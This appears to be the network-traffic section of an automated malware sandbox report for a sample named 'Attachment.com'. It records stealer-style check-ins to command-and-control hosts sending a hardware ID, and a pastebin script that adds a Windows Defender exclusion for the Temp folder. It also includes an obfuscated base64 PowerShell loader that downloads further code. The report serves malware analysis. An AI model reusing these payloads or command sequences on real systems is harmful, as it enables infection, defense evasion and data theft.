                                                                                                                                2024-12-08 00:46:16 UTC1219OUTData Raw: 2d 2d 4b 55 35 58 51 31 4c 4e 35 30 4e 41 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 43 46 31 34 46 44 41 37 37 31 39 38 36 33 34 30 32 32 35 42 44 35 41 46 32 39 45 35 38 0d 0a 2d 2d 4b 55 35 58 51 31 4c 4e 35 30 4e 41 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 55 35 58 51 31 4c 4e 35 30 4e 41 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 53 41 4d 53 4f 4e 0d 0a 2d 2d 4b 55 35 58 51 31 4c
                                                                                                                                Data Ascii: --KU5XQ1LN50NAPMContent-Disposition: form-data; name="hwid"559CF14FDA771986340225BD5AF29E58--KU5XQ1LN50NAPMContent-Disposition: form-data; name="pid"1--KU5XQ1LN50NAPMContent-Disposition: form-data; name="lid"hRjzG3--SAMSON--KU5XQ1L
                                                                                                                                2024-12-08 00:46:17 UTC1007INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=p74n929icvlge7tpcas8bf7ilt; expires=Wed, 02-Apr-2025 18:32:55 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uSRayYKSc70hiuaYt369NVnoSjbOZ5Se%2Fzq0pdgrp5QET6DS081XEdN6nYxCag9pibDhdciT3kk8PPZytqYcRSPfC50Um6jWp4G%2FP3F6rdb24HM1uf7X87CGBMioxEM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bcc898d00f81-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1661&rtt_var=687&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2128&delivery_rate=1757977&cwnd=239&unsent_bytes=0&cid=ce974bba2b79b09a&ts=1094&x=0"
                                                                                                                                2024-12-08 00:46:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                Data Ascii: fok 8.46.123.228
                                                                                                                                2024-12-08 00:46:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.449915104.21.36.514437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:18 UTC268OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=B9DIYYMJD
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 1083
                                                                                                                                Host: toqyxuy.shop
                                                                                                                                2024-12-08 00:46:18 UTC1083OUTData Raw: 2d 2d 42 39 44 49 59 59 4d 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 43 46 31 34 46 44 41 37 37 31 39 38 36 33 34 30 32 32 35 42 44 35 41 46 32 39 45 35 38 0d 0a 2d 2d 42 39 44 49 59 59 4d 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 39 44 49 59 59 4d 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 53 41 4d 53 4f 4e 0d 0a 2d 2d 42 39 44 49 59 59 4d 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                Data Ascii: --B9DIYYMJDContent-Disposition: form-data; name="hwid"559CF14FDA771986340225BD5AF29E58--B9DIYYMJDContent-Disposition: form-data; name="pid"1--B9DIYYMJDContent-Disposition: form-data; name="lid"hRjzG3--SAMSON--B9DIYYMJDContent-Dis
                                                                                                                                2024-12-08 00:46:19 UTC1018INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:19 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=bt1qoi97bn61l75696hikcemm3; expires=Wed, 02-Apr-2025 18:32:58 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YYRzdMSiRCI%2F1KP%2F9zNarQfXrYeJ%2FPv%2FyYJaHNcxDg8NO2jAxRz7%2F4IY%2Fe7s4RDiirCjh4%2B9D6ylUxLpj5%2FFbtem0syCtseItIGceo8b7yVZlitqiUHxv7I2K2PZj4w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bcd76e3e8ce6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1792&rtt_var=714&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1987&delivery_rate=1489036&cwnd=162&unsent_bytes=0&cid=9216b91699f6a808&ts=796&x=0"
                                                                                                                                2024-12-08 00:46:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                Data Ascii: fok 8.46.123.228
                                                                                                                                2024-12-08 00:46:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.449920104.21.36.514437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:20 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 115
                                                                                                                                Host: toqyxuy.shop
                                                                                                                                2024-12-08 00:46:20 UTC115OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 53 41 4d 53 4f 4e 26 6a 3d 37 35 36 37 66 66 66 35 34 36 38 66 35 62 36 38 32 37 38 30 61 65 61 34 63 32 65 62 36 32 36 36 26 68 77 69 64 3d 35 35 39 43 46 31 34 46 44 41 37 37 31 39 38 36 33 34 30 32 32 35 42 44 35 41 46 32 39 45 35 38
                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--SAMSON&j=7567fff5468f5b682780aea4c2eb6266&hwid=559CF14FDA771986340225BD5AF29E58
                                                                                                                                2024-12-08 00:46:21 UTC1010INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=smt60j1edbrkahk5q6tfbbg77a; expires=Wed, 02-Apr-2025 18:33:00 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FjLeX3kpuOzsbj28PizzzRLM%2Bk%2Fi4ThlELOq3rTp7EBj8B0%2FObqeUUCQpASMgZuU2Dy%2BFcnpAZIomkeNXeainiDpVixGti6Xqjv5lmrPuzku0zvDHlGDzV44F5mc14k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bce488195e6d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1750&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1012&delivery_rate=1660978&cwnd=252&unsent_bytes=0&cid=ee85ecc7f4cd7cfc&ts=860&x=0"
                                                                                                                                2024-12-08 00:46:21 UTC307INData Raw: 31 32 63 0d 0a 4f 74 56 33 6b 78 4e 35 35 31 51 5a 33 30 75 6d 79 6a 30 4e 41 5a 2b 36 74 53 31 35 76 56 6f 45 2f 79 70 58 4c 75 72 6e 43 71 78 68 72 6c 58 6d 4d 55 50 46 50 47 32 72 4f 39 58 77 59 53 4a 64 73 4d 72 55 58 67 33 59 4f 47 32 52 42 44 52 42 68 37 73 6c 33 6c 75 69 4b 37 78 32 43 36 73 4d 4c 6f 6f 34 38 75 67 52 4c 32 66 72 6d 49 38 66 56 5a 38 2f 4a 73 55 61 4b 67 4b 52 78 58 2b 4f 41 50 63 66 35 32 63 4a 6c 47 35 46 38 42 65 4a 75 56 52 68 64 2f 72 49 78 6b 59 41 6b 7a 6c 6f 69 6b 67 4c 41 64 36 46 4d 70 51 49 74 6b 2f 50 50 41 71 45 4a 6e 43 76 50 34 54 6d 48 32 74 31 76 59 43 48 41 56 76 59 65 44 37 50 56 33 74 56 79 4a 49 6f 6c 68 69 39 41 2b 64 6a 43 74 30 49 4e 6f 4e 6b 7a 61 5a 55 66 57 4c 2b 7a 74 42 64 45 4d 68 71 4b 6f 78 43 4f 46
                                                                                                                                Data Ascii: 12cOtV3kxN551QZ30umyj0NAZ+6tS15vVoE/ypXLurnCqxhrlXmMUPFPG2rO9XwYSJdsMrUXg3YOG2RBDRBh7sl3luiK7x2C6sMLoo48ugRL2frmI8fVZ8/JsUaKgKRxX+OAPcf52cJlG5F8BeJuVRhd/rIxkYAkzloikgLAd6FMpQItk/PPAqEJnCvP4TmH2t1vYCHAVvYeD7PV3tVyJIolhi9A+djCt0INoNkzaZUfWL+ztBdEMhqKoxCOF
                                                                                                                                2024-12-08 00:46:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.449926104.20.4.2354437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:22 UTC199OUTGET /raw/erLX7UsT HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Host: pastebin.com
                                                                                                                                2024-12-08 00:46:23 UTC391INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:23 GMT
                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                x-frame-options: DENY
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-xss-protection: 1;mode=block
                                                                                                                                cache-control: public, max-age=1801
                                                                                                                                CF-Cache-Status: EXPIRED
                                                                                                                                Last-Modified: Sun, 08 Dec 2024 00:46:23 GMT
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bcf24dccc439-EWR
                                                                                                                                2024-12-08 00:46:23 UTC626INData Raw: 32 36 62 0d 0a 24 6d 33 78 38 79 6b 32 6a 35 71 37 3d 22 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 3b 24 61 31 6b 39 7a 73 37 64 36 66 68 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 42 79 74 65 73 28 22 55 6e 69 71 75 65 53 74 72 69 6e 67 31 22 29 3b 24 77 32 66 68 36 7a 6b 33 6c 39 6a 79 3d 28 24 6d 33 78 38 79 6b 32 6a 35 71 37 2b 22 27 24 65 6e 76 3a 54 45 4d 50 27 22 29 3b 24 70 39 6c 6b 37 7a 64 35 6a 33 78 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 24 61 31 6b 39 7a 73 37 64 36 66 68 29 3b 24 76 34 6a 6b 38 78 37 6c 32 66 68 3d 28 24 6d 33 78 38 79 6b 32 6a
                                                                                                                                Data Ascii: 26b$m3x8yk2j5q7="Add-MpPreference -ExclusionPath ";$a1k9zs7d6fh=[System.Text.Encoding]::ASCII.GetBytes("UniqueString1");$w2fh6zk3l9jy=($m3x8yk2j5q7+"'$env:TEMP'");$p9lk7zd5j3x=[System.Text.Encoding]::ASCII.GetString($a1k9zs7d6fh);$v4jk8x7l2fh=($m3x8yk2j
                                                                                                                                2024-12-08 00:46:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.449933104.21.26.1274437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:25 UTC211OUTGET /int_clp_ldr_sha.txt HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Host: klipcatepiu0.shop
                                                                                                                                2024-12-08 00:46:26 UTC906INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:25 GMT
                                                                                                                                Content-Type: text/plain
                                                                                                                                Content-Length: 9429
                                                                                                                                Connection: close
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                ETag: "6036f403904a4e766dd65cf949738f54"
                                                                                                                                Last-Modified: Sun, 01 Dec 2024 18:08:22 GMT
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wuxeW1y1XZwV09HpOS14XU8Un5R0yOLr9hmRa2WoSwuOHhoutx8F1LZFJVahRNfztjMbyzLDM8yoKQgxn0lTJLpGRFXbQdm%2FKE%2Fq4zpKRFybKIbtUoIx%2FlAi6n1QYdUkQ7xoLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bd023cd4423a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1719&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2868&recv_bytes=825&delivery_rate=1634023&cwnd=170&unsent_bytes=0&cid=f9c071ba8472d835&ts=663&x=0"
                                                                                                                                2024-12-08 00:46:26 UTC463INData Raw: 2d 45 6e 63 20 4a 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 43 41 41 50 51 41 67 41 48 73 41 43 67 41 67 41 43 41 41 49 41 41 67 41 46 4d 41 64 41 42 68 41 48 49 41 64 41 41 74 41 46 4d 41 62 41 42 6c 41 47 55 41 63 41
                                                                                                                                Data Ascii: -Enc JAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcA
                                                                                                                                2024-12-08 00:46:26 UTC1369INData Raw: 42 77 41 47 38 41 62 67 42 7a 41 47 55 41 4b 41 41 70 41 43 34 41 51 77 42 73 41 47 38 41 63 77 42 6c 41 43 67 41 4b 51 41 4b 41 41 6f 41 49 41 41 67 41 43 41 41 49 41 42 54 41 48 51 41 59 51 42 79 41 48 51 41 4c 51 42 54 41 47 77 41 5a 51 42 6c 41 48 41 41 49 41 41 74 41 46 4d 41 5a 51 42 6a 41 47 38 41 62 67 42 6b 41 48 4d 41 49 41 41 78 41 41 6f 41 43 67 41 67 41 43 41 41 49 41 41 67 41 46 73 41 55 77 42 35 41 48 4d 41 64 41 42 6c 41 47 30 41 4c 67 42 4f 41 47 55 41 64 41 41 75 41 46 63 41 5a 51 42 69 41 46 49 41 5a 51 42 78 41 48 55 41 5a 51 42 7a 41 48 51 41 58 51 41 36 41 44 6f 41 51 77 42 79 41 47 55 41 59 51 42 30 41 47 55 41 4b 41 41 69 41 47 67 41 64 41 42 30 41 48 41 41 63 77 41 36 41 43 38 41 4c 77 42 33 41 48 63 41 64 77 41 75 41 47 49 41 59
                                                                                                                                Data Ascii: BwAG8AbgBzAGUAKAApAC4AQwBsAG8AcwBlACgAKQAKAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxAAoACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGIAY
                                                                                                                                2024-12-08 00:46:26 UTC1369INData Raw: 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 41 75 41 45 51 41 62 77 42 33 41 47 34 41 62 41 42 76 41 47 45 41 5a 41 42 45 41 47 45 41 64 41 42 68 41 43 67 41 4a 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 41 70 41 41 6f 41 43 67
                                                                                                                                Data Ascii: sAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoACg
                                                                                                                                2024-12-08 00:46:26 UTC1369INData Raw: 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 43 34 41 55 77 42 6c 41 47 55 41 61 77 41 6f 41 44 41 41 4c 41 41 67 41 46 73 41 55 77 42 35 41 48 4d 41 64 41 42 6c 41 47 30 41 4c 67 42 4a 41 45 38 41 4c 67 42 54 41 47 55 41 5a 51 42 72 41 45 38 41 63 67 42 70 41 47 63 41 61 51 42 75 41 46 30 41 4f 67 41 36 41 45 49 41 5a 51 42 6e 41 47 6b 41 62 67 41 70 41 41 6f 41 43 67 41 67 41 43 41 41 49 41 41 67 41 43 51 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42 73 41 47 77 41 62 41 42
                                                                                                                                Data Ascii: AGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAC4AUwBlAGUAawAoADAALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBTAGUAZQBrAE8AcgBpAGcAaQBuAF0AOgA6AEIAZQBnAGkAbgApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAB
                                                                                                                                2024-12-08 00:46:26 UTC1369INData Raw: 43 41 41 4a 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 41 67 41 44 30 41 49 41 42 62 41 46 4d 41 65 51 42 7a 41 48 51 41 5a 51 42 74 41 43 34 41 53 51 42 50 41 43 34 41 55 41 42 68 41 48 51 41 61 41 42 64
                                                                                                                                Data Ascii: CAAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABd
                                                                                                                                2024-12-08 00:46:26 UTC1369INData Raw: 6b 41 59 77 42 68 41 48 51 41 61 51 42 76 41 47 34 41 43 67 41 67 41 43 41 41 49 41 41 67 41 43 51 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 41 67 41 44 30 41 49 41 41 6b 41 47 77 41 62 41 42 73 41
                                                                                                                                Data Ascii: kAYwBhAHQAaQBvAG4ACgAgACAAIAAgACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAD0AIAAkAGwAbABsA
                                                                                                                                2024-12-08 00:46:26 UTC1369INData Raw: 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 41 75 41 45 4d 41 62 77 42 77 41 48 6b 41 53 41 42 6c 41 48 49 41 5a 51 41 6f 41 43 51 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48 67 41 65 41 42 34 41 48
                                                                                                                                Data Ascii: AeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAuAEMAbwBwAHkASABlAHIAZQAoACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AH
